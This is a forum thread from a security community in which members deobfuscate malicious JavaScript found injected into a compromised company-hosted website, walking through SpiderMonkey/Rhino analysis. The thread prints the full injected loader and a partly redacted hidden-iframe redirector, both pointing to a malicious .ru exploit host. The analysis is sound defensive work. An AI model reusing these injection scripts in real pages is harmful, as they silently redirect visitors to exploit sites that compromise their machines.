EH-Net (The Ethical Hacker Network) forums - Ethical Hacking Discussions and Related Certifications - Malware
Topic: Obfuscated code sample - need advice on how to break down the language and parse
oldgrue
« on: April 09, 2010, 11:27:41 AM »

Being not much of a coder (a core skill I'm working on still), I've run into a string of suspicious code that I can't wrap my head around for the life of me.

Here's the opening chunk
Quote
<script>var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1))

Can someone point me to:
a) how to determine which language this is
b) a good obfuscated code tutorial
Ketchup
« Reply #1 on: April 09, 2010, 12:55:58 PM »

This is JavaScript. You don't have the complete code, made clear by the lack of a closing </script> tag and the lack of matching ending brackets in the code. You don't have too much of the code, but it's not terribly obfuscated besides some variable names and such. Do you have any more?

Code:
<script>
var Je;
if(Je!='Pu' && Je!='X')
{
     Je=''
};
var l=new String();
this.Iq="";
function J()
{
     var _=new Array();
     var v;
     if(v!='CR' && v != '')
     {
          v=null
     };
     var B=RegExp;
     var Cu='';
     var tN;
     if(tN!='O' && tN!='Nn')
     {
          tN=''
     };
     var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1))
n1p
« Reply #2 on: April 09, 2010, 04:47:12 PM »

Yeah, you need to see what context it is being run in. Function J is not being called yet, and it doesn't do much as yet.

The variable j evaluates to "replace", which I'd imagine will be used to deobfuscate some hex later on using a regular expression, possibly the B variable you can see. Look out for an eval function. Change that to a print and run it in something like Rhino/SpiderMonkey to get the final code at runtime.

n1p
oldgrue
« Reply #3 on: April 13, 2010, 08:20:46 AM »

here's the whole thing:

Quote
<script>
var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1));var C=unescape("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6f%79%75%6e%6c%61%72%31%2e%63%6f%6d%2f%76%6f%69%6c%61%2e%66%72%2f%67%6f%6f%67%6c%65%2e%68%72%2e%70%68%70");var s=window;var n;if(n!='' && n!='R'){n=null};var P='';var ns;if(ns!='' && ns!='lC'){ns=''};var Z=new String("]");var Rt="";function m(F,U){this.IR="";var Gt;if(Gt!='Rk' && Gt!='eu'){Gt='Rk'};var p=String("[");var hs='';p+=U+Z;var UX;if(UX!='k' && UX!='Ij'){UX='k'};var K;if(K!='Nq' && K != ''){K=null};var E="";var w=new B(p, String("g"));var RX=new String();var mW;if(mW!='bd' && mW!='AQ'){mW=''};return F[j](w, P);this.dQ='';var jk=new Array();};var EW;if(EW!='Rb'){EW=''};this.i="";var Kv;if(Kv!='XY'){Kv=''};var Z_='';var D;if(D!='JE'){D='JE'};var nm;if(nm!='cn'){nm='cn'};var y="scri"+"w1bNpt".substr(4);var u=m('89240366892305249','97125364');var Oc="";var WV;if(WV!=''){WV='Ww'};var uK=unescape("%68%74%74%70%3a%2f%2f%71%71%2d%63%6f%6d%2e%68%75%61%6e%71%69%75%2e%63%6f%6d%2e%61%6d%61%7a%6f%6e%2d%63%6e%2e%73%77%65%65%74%68%6f%6d%65%73%61%6c%65%2e%72%75%3a");var so;if(so!='' && so!='yq'){so=null};s["on"+"lo"+"ad"]=function(){var T=new Array();this.dP="";try {var RZ;if(RZ!='fx'){RZ='fx'};Z_=uK+u;var gP=new String();var XJ=new String();Z_+=C;var Ne='';var yi;if(yi!='aY'){yi='aY'};Uv=document.createElement(y);var IJ=new Array();Uv["src7Dkj".substr(0,3)] = Z_;Uv["dexAOR".substr(0,2)+"fe"+"r"]=[1][0];var Pq='';document.body.appendChild(Uv);} catch(d){var kF=new Date();};var Dp='';var LH;if(LH!='jI'){LH='jI'};};var Gy=new Array();var JH;if(JH!='Zz'){JH=''};var Ao='';};J(); </script>
<!--11c9667af5fb24752950373afb93b6d1-->

I appreciate all the help so far!
Ketchup
« Reply #4 on: April 13, 2010, 01:34:10 PM »

That's a good amount of code. I need to take a look at it in more detail. However, preliminarily it looks like a hidden frame with a link to the following URL:

Quote
hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru

From there it would likely be some sort of IE, Java, Firefox, etc. attack to compromise your machine.
n1p
« Reply #5 on: April 13, 2010, 04:21:44 PM »

Hey,

Close enough. The script below is the stripped-down one with the junk removed. It simply uses a body onload() to redirect the user unawares to another page. On that further page is more malicious code. This checks to see if you have come from a search engine and delivers an exploit. I can investigate this further if you want a tutorial/further information?

I usually strip code down so that I can debug it through spidermonkey/rhino. Here is the output of my efforts:


WARNING!!!!: Malicious code below. I have removed certain details so it cannot be used. The full URL is also wrong

Code:
Unescaped C: /google.com/google.com/oyunlar.com/voia.fr/google.php
This is y: script
Regular expression to be run on p: /[97125364]/g
Return Val of Function m: 8080
This is uK: hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:
This is Z_ which finally concatenates port and URL found earlier: hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:8080/google.com/google.com/oyunlar.com/voia.fr/google.php

Code:
// Stripped-down loader for a JS shell (spidermonkey/rhino); print() is the shell builtin.
function J()
{
   var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1));   // "replace"
   var C=unescape("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6f%79%75%6e%6c%61%72%31%2e%63%6f%6d%2f%76%6f%69%6c%61%2e%66%72%2f%67%6f%6f%67%6c%65%2e%68%72%2e%70%68%70");
   var s= "";

   var P='';
   print("Unescaped C: "+ C);
   var Z=new String("]");

   // Strips every character listed in U out of F: "[97125364]" leaves only the 8s and 0s.
   function m(F,U)
   {
     var p=String("[");
     p+=U+Z;
     var w=new RegExp(p, "g");
     print ("Regular expression to be run on p: "+ w);
     var returnVal = '';
     returnVal = F[j](w, P);
     print ("Return Val of Function m: " + returnVal);
     return returnVal;
   };

   var Z_='';
   var y="scri"+"w1bNpt".substr(4);   // "script"
   print ("This is y: " + y);
   var u=m('89240366892305249','97125364');   // the port, "8080"

   var uK=unescape("%68%74%74%70%3a%2f%2f%71%71%2d%63%6f%6d%2e%68%75%61%6e%71%69%75%2e%63%6f%6d%2e%61%6d%61%7a%6f%6e%2d%63%6e%2e%73%77%65%65%74%68%6f%6d%65%73%61%6c%65%2e%72%75%3a");
   print ("This is uK: " + uK);
   Z_=uK+u;
   Z_+=C;
   print ("This is Z_ which finally concatenates port and URL found earlier: " + Z_);
   // Stand-in for the <script> element the real page creates with document.createElement(y);
   // there is no DOM in the shell, so a plain object just records the two attributes set on it.
   var Uv = {};
   Uv["src7Dkj".substr(0,3)] = Z_;                 // Uv.src = Z_
   Uv["dexAOR".substr(0,2)+"fe"+"r"]=[1][0];       // Uv.defer = 1
};
J();

Cheers,
n1p
« Last Edit: April 13, 2010, 04:30:20 PM by n1p »
oldgrue
« Reply #6 on: April 13, 2010, 04:42:15 PM »

I figured it was unpleasant, just not how much so. Any more of a tutorial, and related readings, would be greatly appreciated.
n1p
« Reply #7 on: April 13, 2010, 04:52:07 PM »

Yeah sure, soon as I get some spare time I will run through something briefly. Can you provide any background info on this? Was it a compromised site or just something you came across?
oldgrue
« Reply #8 on: April 14, 2010, 09:30:20 AM »

This code showed up on a compromised website my company is hosting. We're looking into the machine serving it to determine whether the virtual server or the machine itself was compromised, as a different issue.

n1p
« Reply #9 on: April 14, 2010, 03:45:31 PM »

That main page is now serving a photo blog of some sort. Seems to be updating as I analyse it.

Some further analysis leads to that page I displayed earlier. Using the correct referrer and user-agent I can then get some more malicious code, which mutates on every request. The structure is the same every time, but functions and variables become mangled. Quite interesting stuff.

Analysed the code below:

WARNING!!!! Malicious code. Be careful. Redacted accordingly

Code:
Gnqt33 = 'h!^t#t(^$p)(!(#:@))(/)/!(q!((q$$@()-&$@#!c&^#o^m^@!.&h^&^u))$a#n)q&i$^)u$^@(.&&c##(o))m!^$(.$&@&a)!#m&)@)a#@!&z@(#o#))@#n^!-(($!c@^@n&@(#$.(&^s)(w@)e^!(#e)t!$!h@^o(m!#&e&^s@a@l#$)^e@^.^r(@#u!$$)'.replace(/&|@|\$|\!|\)|#|\(|\^/ig, '');
Udirdbov = 'UdirdbovVzmrac';
Usocrqo4 = document.createElement('i2aImzeI'.replace(/[I\$2zs]/g, ''));
Udirdbov = 'UdirdbovVzmrac';
Vzmrac = '';
S5gtbh = '';
Udirdbov = document.referrer;
function Svr8a9t(Zwo94e,O3kbb8s){
if (Udirdbov.indexOf(Zwo914e) != -1){
    Vzmrac=Zwo914e;
    Yx240e66 = Udirdbov.indexOf(O3kbb8s+'=');
    if (Yx240e66 != -1){
     S5gtbh = Udirdbov.substring(Yx240e66+2).split('&')[0];   
    }
}
}
//Svr8a9t('google.','q');Svr8a9t('search.yahoo.','p');Svr8a9t('ask.com','q');

Usocrqo4.style.visibility = 'h&i)&@d^!#$d#e$(#)#n$&)'.replace(/#|\)|\$|\(|@|\^|&|\!/ig, '');
Usocrqo4.src = Gnqt33+':N8N060N/6i]n6d]]x6.6vhvpN?vj}a6=}&}j6l]=N'.replace(/[N\]6\}v]/g, '')+Vzmrac+'&kl='+S5gtbh;
document.body.appendChild(Usocro4);

Again using spidermonkey, I reversed this code to see that it is in fact an iframe that is hidden. It links to another page on the site and includes some values created by the script and your originating referrer (e.g. Google).

This is the value of Usocrqo4: iframe
This is S5gtbh: dirdbo
This is the visibility of the iframe: hidden
This is the final concatenation of the iframe url src: hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:8080/index.php?ja=&jl=&kl=dirdbo

Still more to analyse as need to form correct iframe URL to get to what I believe will be the malware delivery page.
Ketchup
« Reply #10 on: April 14, 2010, 04:01:02 PM »

Nice n1p!   

My experience with this type of code is that it usually hops through at least a few rooted web hosts before you actually find the original one. The code usually morphs with each hop as well.

It's interesting that the code is morphing with each request. Enforcing specific referrers is a bit interesting too. Seems like this stuff is growing in complexity.
n1p
« Reply #11 on: April 14, 2010, 04:05:41 PM »

Requiring a user-agent and referrer are usually done to prevent researchers like us from simply using wget to grab pages!

So they will look to see if you are using Firefox and coming from a Google search, etc.

Yes, I have never seen mutating JS before. Nice to come across. Thanks for that oldgrue.
oldgrue
« Reply #12 on: April 14, 2010, 04:20:42 PM »

Thanks for the help! Now for the fun (?) part - learning and catching up on the how with an example in hand.
n1p
« Reply #13 on: April 15, 2010, 02:58:42 AM »

Hey,

That is no problem at all. I actually enjoy reversing this stuff (sadly!). If you need any assistance just shout. If I can, I will document my steps for analysing JavaScript and that.

I would highly suggest looking at SpiderMonkey/Rhino, especially Didier Stevens' version of SpiderMonkey. The implementation is specifically for this task.
carboncopy
« Reply #14 on: April 21, 2010, 05:01:52 AM »

Good stuff n1p!

I also recommend checking this website for those that do not use rhino or spidermonkey.

http://jsunpack.jeek.org/dec/go

These are the results from the JS above.
http://jsunpack.jeek.org/dec/go?report=ebfc13712044bad5b1a1c287d36f93852b9310c5